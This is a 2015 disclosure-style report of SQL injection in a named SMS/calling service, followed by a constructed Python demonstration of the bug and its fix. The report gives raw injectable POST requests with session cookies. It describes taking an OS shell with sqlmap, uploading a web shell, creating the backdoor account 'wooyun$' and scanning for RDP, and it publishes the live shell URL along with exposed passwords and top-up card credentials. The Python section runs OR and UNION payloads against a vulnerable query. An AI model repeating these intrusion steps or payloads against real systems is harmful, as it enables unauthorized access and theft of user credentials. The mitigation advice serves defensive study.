
SQL injection in a 多打电话 system: 19 databases with DBA privileges, top-ups possible (Getshell + 3389 already obtained)

2015-08-28


Details:

POST /do/showfrees.php HTTP/1.1
Content-Length: 49
Content-Type: application/x-www-form-urlencoded
Referer: http://log.iddsms.com:80/
Cookie: PHPSESSID=0qvtojevmi3q6u8eik14p9hk45; phpMyAdmin=bs8fod59n8t6hruc96r7hlpnaq3rk4k9; pma_lang=en; pma_collation_connection=utf8_general_ci; pma_mcrypt_iv=1qvTC%2Fd4Ngg%3D
Host: log.iddsms.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

sButton2=%c9%b8%d1%a1&number=1&searchAction=1


Injectable parameter: number (note also the phpMyAdmin session cookies in the request, which indicate phpMyAdmin is deployed on the same host)

POST /do/showhmd.php HTTP/1.1
Content-Length: 60
Content-Type: application/x-www-form-urlencoded
Referer: http://log.iddsms.com:80/
Cookie: PHPSESSID=0qvtojevmi3q6u8eik14p9hk45; phpMyAdmin=bs8fod59n8t6hruc96r7hlpnaq3rk4k9; pma_lang=en; pma_collation_connection=utf8_general_ci; pma_mcrypt_iv=1qvTC%2Fd4Ngg%3D
Host: log.iddsms.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*

sButton2=%c9%b8%d1%a1&number=1&searchAction=1&username=1





Injectable parameter: username


[Screenshots of the injection results: QQ图片20150712211851.png, QQ图片20150712212025.png, QQ图片20150712212116.png, QQ图片20150712212245.png, QQ图片20150712212305.png]





Used sqlmap's --os-shell to push a shell up and take a look.


[Screenshot: QQ图片20150712212358.png]



This generated two files on the web root (the file-upload stager and the backdoor that sqlmap's --os-shell relies on).

[Screenshot: QQ图片20150712212448.png]





Uploaded a web shell directly.


[Screenshots of the shell: QQ图片20150712212534.png, QQ图片20150712212647.png, QQ图片20150712212751.png]





The notification SMS sent to users also contains the account's default password.


[Screenshots: QQ图片20150712212831.png, QQ图片20150712212933.png]





Top-up card numbers and passwords are exposed as well.

The RDP service had been moved off the default port 3389.



Ran Nmap against the host and found port 1988 open.


[Screenshots of the Nmap scan: QQ图片20150712213153.jpg, QQ图片20150712213211.jpg]





Did not log in over RDP, to avoid kicking the administrator offline.



Shell URL: http://log.iddsms.com/logss.php

System user created: wooyun$


Solution:

Filter and validate the number and username parameters, and build the queries with parameterized statements instead of string concatenation. Also remove the shell at /logss.php and the wooyun$ account, and stop sending default passwords in notification SMS.
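As an added example (not code from the report or from the iddsms.com application, whose source is not shown), the following Python/sqlite3 script reconstructs the pattern behind the `number` and `username` injections and the fix the solution asks for: a concatenated query that accepts the `OR`/`UNION` payloads, beside a parameterized query plus an allow-list filter that rejects them. The table and column names, sample rows and helper names are assumptions; the in-memory SQLite stand-in also cannot model the cross-database reads a MySQL DBA account allows, only the injection mechanics.

```python
import re
import sqlite3


def make_db():
    # Constructed stand-in for the application's database (assumption:
    # the real schema behind showfrees.php is not shown in the report).
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE freenumbers (id INTEGER PRIMARY KEY, number TEXT, owner TEXT);
        CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO freenumbers VALUES (1, '1', 'alice'), (2, '2', 'bob'), (3, '3', 'carol');
        INSERT INTO users VALUES (1, 'admin', 's3cret'), (2, 'wooyun', 'wooyun');
    """)
    return con


def show_frees_vulnerable(con, number):
    # Hypothetical reconstruction of the bug: the POST parameter is pasted
    # straight into the SQL text, so a quote in it closes the literal and the
    # rest of the value is parsed as SQL (OR 1=1, UNION SELECT ..., etc.).
    sql = "SELECT id, number, owner FROM freenumbers WHERE number = '" + number + "'"
    return con.execute(sql).fetchall()


def show_frees_fixed(con, number):
    # Hardened form: the value is bound to a placeholder, so the driver hands
    # it to the engine as data and it can never alter the query's structure.
    sql = "SELECT id, number, owner FROM freenumbers WHERE number = ?"
    return con.execute(sql, (number,)).fetchall()


NUMBER_RE = re.compile(r"\d{1,20}")


def validate_number(number):
    # Allow-list filter as a second layer (the "filter" the report recommends):
    # a phone/record number is digits only; anything else is rejected outright.
    if not NUMBER_RE.fullmatch(number):
        raise ValueError("invalid number parameter")
    return number


def show_frees_safe(con, number):
    # Both layers together: reject malformed input, then query with binding.
    return show_frees_fixed(con, validate_number(number))


if __name__ == "__main__":
    con = make_db()
    tautology = "1' OR '1'='1"
    union = "x' UNION SELECT id, username, password FROM users--"
    print("vulnerable, OR payload:   ", show_frees_vulnerable(con, tautology))
    print("vulnerable, UNION payload:", show_frees_vulnerable(con, union))
    print("parameterized, OR payload:", show_frees_fixed(con, tautology))
    try:
        show_frees_safe(con, union)
    except ValueError as exc:
        print("filtered:", exc)
```

The `UNION` payload is the same primitive a tool such as sqlmap automates: with three columns in the original SELECT, a three-column SELECT from another table returns that table's rows through the page, and on the real MySQL backend a DBA account can point it at any of the 19 databases. The parameterized version returns nothing for the tautology because no row literally has `1' OR '1'='1` as its number, which is the behaviour you want.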
